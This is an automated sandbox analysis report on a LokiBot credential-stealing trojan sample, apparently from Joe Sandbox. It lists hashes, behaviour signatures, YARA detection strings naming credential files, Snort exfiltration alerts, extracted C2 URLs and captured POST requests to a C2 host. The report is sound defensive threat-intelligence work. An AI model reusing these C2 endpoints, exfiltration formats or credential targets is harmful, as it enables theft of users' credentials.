Windows Analysis Report
kVijllv0Yl

Overview

General Information

Sample Name: kVijllv0Yl (renamed file extension from none to exe)
Analysis ID: 562515
MD5: 6997de404fb7e798aecc2c8a14fd2f12
SHA1: 121a437542ba544f975847429dda439719800bb9
SHA256: f36a543cfcddf76b99df925bf70b22d560792d1059387e00bfe782bffd6e8a2b
Tags: 32, exe, Loki, trojan

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • kVijllv0Yl.exe (PID: 2312 cmdline: "C:\Users\user\Desktop\kVijllv0Yl.exe" MD5: 6997DE404FB7E798AECC2C8A14FD2F12)
    • kVijllv0Yl.exe (PID: 1292 cmdline: "C:\Users\user\Desktop\kVijllv0Yl.exe" MD5: 6997DE404FB7E798AECC2C8A14FD2F12)
  • cleanup

Malware configuration (Lokibot):
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara matches (memory dumps)

Source | Rule | Description | Author
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifacts observed in infostealers | ditekSHen
  Strings:
  • 0x17936:$f1: FileZilla\recentservers.xml
  • 0x17976:$f2: FileZilla\sitemanager.xml
  • 0x15be6:$b2: Mozilla\Firefox\Profiles
  • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x15afa:$s4: logins.json
  • 0x169a4:$s6: wand.dat
  • 0x15424:$a1: username_value
  • 0x15414:$a2: password_value
  • 0x15a5f:$a3: encryptedUsername
  • 0x15acc:$a3: encryptedUsername
  • 0x15a72:$a4: encryptedPassword
  • 0x15ae0:$a4: encryptedPassword
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Loki_1 | Loki Payload | kevoreilly
  Strings:
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
Yara matches (unpacked PE files)

Source | Rule | Description | Author
0.2.kVijllv0Yl.exe.1ade0000.3.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  Strings:
  • 0x13278:$s1: http://
  • 0x16233:$s1: http://
  • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13280:$s2: https://
  • 0x13278:$f1: http://
  • 0x16233:$f1: http://
  • 0x13280:$f2: https://
0.2.kVijllv0Yl.exe.1ade0000.3.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
0.2.kVijllv0Yl.exe.1ade0000.3.unpack | Loki_1 | Loki Payload | kevoreilly
  Strings:
  • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x133fc:$a2: last_compatible_version
0.2.kVijllv0Yl.exe.1ade0000.3.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x123ff:$des3: 68 03 66 00 00
  • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.0.kVijllv0Yl.exe.400000.9.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  Strings:
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://

No Sigma rule has matched

          AV Detection

Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Source: kVijllv0Yl.exe, Virustotal: Detection: 40%
Source: kVijllv0Yl.exe, ReversingLabs: Detection: 47%
Source: http://secure01-redirect.net/gc15/fre.php, Avira URL Cloud: Label: malware
Source: secure01-redirect.net, Virustotal: Detection: 21%
Source: http://secure01-redirect.net/gc15/fre.php, Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll, Virustotal: Detection: 27%
Source: kVijllv0Yl.exe, Joe Sandbox ML: detected
Source: 1.0.kVijllv0Yl.exe.400000.3.unpack, Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.kVijllv0Yl.exe.400000.1.unpack, Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.kVijllv0Yl.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.kVijllv0Yl.exe.400000.2.unpack, Avira: Label: TR/Patched.Ren.Gen2
Source: kVijllv0Yl.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\kVijllv0Yl.exe, Code function: 0_2_00405D7C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\kVijllv0Yl.exe, Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\kVijllv0Yl.exe, Code function: 0_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\kVijllv0Yl.exe, Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

          Networking

Source: Traffic, Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49769 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49769 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49770 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49770 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 185.185.69.76:80
Source: Traffic, Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49771
Source: Malware configuration extractor, URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor, URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor, URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor, URLs: http://alphastand.top/alien/fre.php
Source: Joe Sandbox View, ASN Name: SPRINTHOSTRU SPRINTHOSTRU
Source: global traffic, HTTP traffic detected: POST /gc15/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: secure01-redirect.net Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 7A2E941E Content-Length: 196 Connection: close
Source: global traffic, HTTP traffic detected: POST /gc15/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: secure01-redirect.net Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 7A2E941E Content-Length: 169 Connection: close
          Source: kVijllv0Yl.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: kVijllv0Yl.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: kVijllv0Yl.exe, 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://secure01-redirect.net/gc15/fre.php
          Source: kVijllv0Yl.exe, kVijllv0Yl.exe, 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
          Source: unknown | HTTP traffic detected:
            POST /gc15/fre.php HTTP/1.0
            User-Agent: Mozilla/4.08 (Charon; Inferno)
            Host: secure01-redirect.net
            Accept: */*
            Content-Type: application/octet-stream
            Content-Encoding: binary
            Content-Key: 7A2E941E
            Content-Length: 196
            Connection: close
          Source: unknown | DNS traffic detected: queries for: secure01-redirect.net
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 1_2_00404ED4 recv,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          System Summary

          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: kVijllv0Yl.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
